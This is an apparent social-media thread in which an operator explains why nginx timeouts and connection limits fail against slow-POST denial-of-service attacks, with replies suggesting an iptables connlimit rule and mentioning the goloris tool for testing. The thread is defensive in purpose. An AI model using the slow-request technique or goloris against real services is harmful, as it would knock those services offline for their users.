We've had to start hardening our services against increasingly frequent Denial of Service (DoS) attacks. OVH provides DDoS mitigation, but this a smaller scale problem.
Unfortunately, nginx lacks some important configuration options and some others are specific to NGINX Plus.
Conversation
Setting client_body_timeout to 15s won't time out a client sending 1 byte every 10s. There's no timeout for receiving the whole body. Only permitting tiny request bodies helps but isn't always an option. There's no way to timeout based on a minimum rate or even the total time.
1
1
blog.cloudflare.com/the-curious-ca is a post about the interaction between send timeouts and buffering. It's not quite the same thing and buffer bloat mitigations may partially address it. Still, it shows how this approach to timeouts based on time between system calls doesn't work well.
1
2
The configuration option to queue connections as a reverse proxy instead of dropping them (nginx.org/en/docs/http/n) is only available for NGINX Plus. This seems a bit ridiculous. I mistakenly thought the proprietary variant was for enterprise features, not basic functionality.
1
1
Replying to
Not a full solution, but iptables --syn -m connlimit --connlimit-above 8 and setting client_header_timeout (which is the whole header) works to a certain extend..
1
Replying to
client_header_timeout is the whole header portion but the body following it doesn't have a comparable setting and appears to be what gets abused. We're using nginx's support for limiting connections right now but we can't be that strict in a normal situation due to shared IPs.
1
Carrier-grade NAT, VPNs, etc. mean that many users can be behind a single IP. Also, HTTP < 2 opens a lot of connections for each user while HTTP > 1 multiplexes streams and can create a lot of concurrent work with a single connection so nginx's limit treats each stream as a conn.
github.com/valyala/goloris with a reverse proxy endpoint that accepts POST from a bunch of IPs is kind of thing we are trying to work around and the existing settings really aren't adequate. It's not quite the same as what's happening but it's what I'm using to test changes for now.
Replying to
Most browsers which HTTP/1.1 have an hard limit at 8 concurrent. But that doesn't solve NAT...
1
Replying to
A user could use multiple browsers, etc. There are a lot of ways of legitimately going over that. The HTTP/2 standard recommends permitting 100 streams by default so a single HTTP/2 connection can trigger an insane amount of work. nginx layer limit is needed to deal with that.
1
Show replies

